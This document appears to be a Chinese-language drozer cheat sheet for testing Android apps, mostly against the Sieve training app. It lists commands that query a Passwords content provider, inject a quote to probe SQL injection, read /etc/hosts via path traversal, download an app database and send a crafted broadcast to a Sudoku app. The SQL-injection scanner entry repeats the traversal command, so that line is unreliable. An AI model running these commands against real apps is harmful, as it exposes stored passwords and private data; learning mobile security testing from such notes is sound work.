run app.package.attacksurface com.mwr.example.sieve
Acitivity
获取 Activity 信息
1
run app.activity.info -a com.mwr.example.sieve
启动 activity
1
run app.activity.start --component com.mwr.example.sieve 活动名称
Content Provider
获取 Content Provider 信息
1
run app.provider.info -a com.mwr.example.sieve
检测目录遍历漏洞
1
run scanner.provider.traversal -a com.mwr.example.sieve
检测 SQL 注入漏洞
1
run scanner.provider.traversal -a com.mwr.example.sieve
目录遍历漏洞
爆破 uri
1
run scanner.provider.finduris -a com.mwr.example.sieve
查询 uri
1
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
SQL 注入漏洞
1
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"
系统文件访问
1
run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
系统文件下载
1
run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data /data/com.mwr.example.sieve/databases/database.db /home/user/database.db
Broadcast
获取 Broadacast 信息
1
run app.broadcast.info -a com.icenta.sudoku.ui
空 action 攻击
1
run app.broadcast.send --component com.icenta.sudoku.ui com.heyzap.sdk.ads.PackageAddedReceiver